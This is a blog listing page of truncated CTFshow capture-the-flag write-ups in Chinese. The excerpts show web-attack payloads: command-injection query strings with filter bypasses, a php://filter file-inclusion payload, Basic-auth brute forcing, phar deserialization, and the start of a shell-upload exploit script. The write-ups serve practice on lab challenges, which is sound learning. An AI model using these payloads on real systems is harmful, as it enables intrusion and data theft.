CTFshow
文章平均质量分 73
ctf.show
ScyLamb
这个作者很懒,什么都没留下…
展开
-
CTFshow_终极考核_EXP
EXP ALL IN HEREexp exp exp ヾ(・ω・`。)import requestsimport base64import reimport timedef getShell(url): burp0_url = url + "system36d/users.php?action=upload" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Us原创 2022-01-05 20:54:36 · 956 阅读 · 0 评论 -
CTFshow_终极考核_个人WP
CTFshow_终极考核参考不打算参考0x00 web640flag_640=ctfshow{060ae7a27d203604baeb125f939570ef}这里就陆陆续续记录些杂乱的做题笔记吧做之前提醒自己信息收集后果必有前因640前端发现可疑路径 system36dPHP/7.3.22 nginx/1.21.1][10:52:15] 200 - 43B - /.bowerrc[10:53:35] 200 - 34B - /.gitign原创 2022-01-05 20:48:41 · 5439 阅读 · 0 评论 -
CTFshow_web入门_命令执行
0x00 web29只过滤flag?c=system('ls');?c=system('cat `ls`');预期解:echo `nl fl''ag.php`;0x01 web30if(!preg_match("/flag|system|php/i", $c)){过滤了文件名、一个系统命令执行函数、php?c=passthru('ls');?c=passthru("nl fl''ag.ph''p");预期解:echo `nl fl''ag.p''hp`;0x02 web31原创 2021-04-30 18:38:41 · 424 阅读 · 2 评论 -
CTFshow_反序列化_web276
web276 phar反序列化对phar的利用当时学的时候是半知半解,导致写这题花了好久,又无wp,最后然后尝试用单步调试解决了<?phphighlight_file(__FILE__);class filter{ public $filename; public $filecontent; public $evilfile=false; public $admin = false; public function __construct($f,$f原创 2021-04-28 09:40:08 · 755 阅读 · 1 评论 -
CTFshow_web入门_文件包含
文件包含文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web1170x00 web78if(isset($_GET['file'])){ $file = $_GET['file']; include($file);无过滤?file=php://filter/原创 2021-03-09 10:51:11 · 874 阅读 · 1 评论 -
ctfshow 群友挑战 CTFshow福利抽奖
打开即可看见flag【域名后面不能有路径,如https://www.baidu.com/】然后去提交flag,可以清楚的发现没有提交flag的框**!!!**然后,憨憨的我跑去环境中找,看看有没有后台啥的再然后,我发现我是憨憨,没有提交框就自己写个呗。。。如下,简简单单的Python脚本:import requestsurl='https://ctf.show/api/v1/challenges/attempt'data='{"challenge_id":"1089","submissi.原创 2021-03-05 20:14:54 · 1020 阅读 · 1 评论 -
CTFshow_web入门_命令执行_web29~54
0x00 web29if(!preg_match("/flag/i", $c)){只过滤flag【不区分大小写】?c=system('ls');?c=system('cat `ls`');预期解:echo `nl fl''ag.php`;0x01 web30if(!preg_match("/flag|system|php/i", $c)){过滤了文件名、一个系统命令执行函数、php【不区分大小写】?c=passthru('ls');?c=passthru("nl fl''ag.原创 2021-02-07 20:22:05 · 1610 阅读 · 2 评论 -
CTFshow_web入门_爆破
0x01 web21参考链接:tomcat 认证爆破之custom iterator使用burpsuite大致步骤:①抓包发送至intruder②base64解码Authorization: Basic YWRtaW46YWFhYQ===》Authorization: Basic admin:aaaa③添加为payload§YWRtaW46YWFhYQ==§,payload type设置为custom iterator【自定义迭代器】④position 1中输入admin,position 2原创 2021-01-24 14:15:24 · 360 阅读 · 0 评论 -
CTFshow_web入门_信息搜集
https://blog.csdn.net/qq_44893894/article/details/1093805290x00 web1payload:查看源代码0x01 web2<script type="text/javascript"> window.oncontextmenu = function(){return false}; window.onselectstart = function(){return false}; window.onkeydown = func原创 2021-01-20 21:20:13 · 259 阅读 · 0 评论 -
CTFshow_萌新计划_web1-21
0x01 web1关键代码:if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id原创 2021-01-04 17:09:40 · 3425 阅读 · 2 评论 -
ctfshow_萌新_萌新隐藏题
https://harvey-blog.com/Safety/5250x01 萌新认证加群召唤flag0x02 萌新_密码萌新不会53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D看见没有大于F的字符,尝试16进制写Python脚本,每2位16进制转文本import renumber = '53316C6B5A6A42684D3原创 2021-01-03 20:34:10 · 3256 阅读 · 0 评论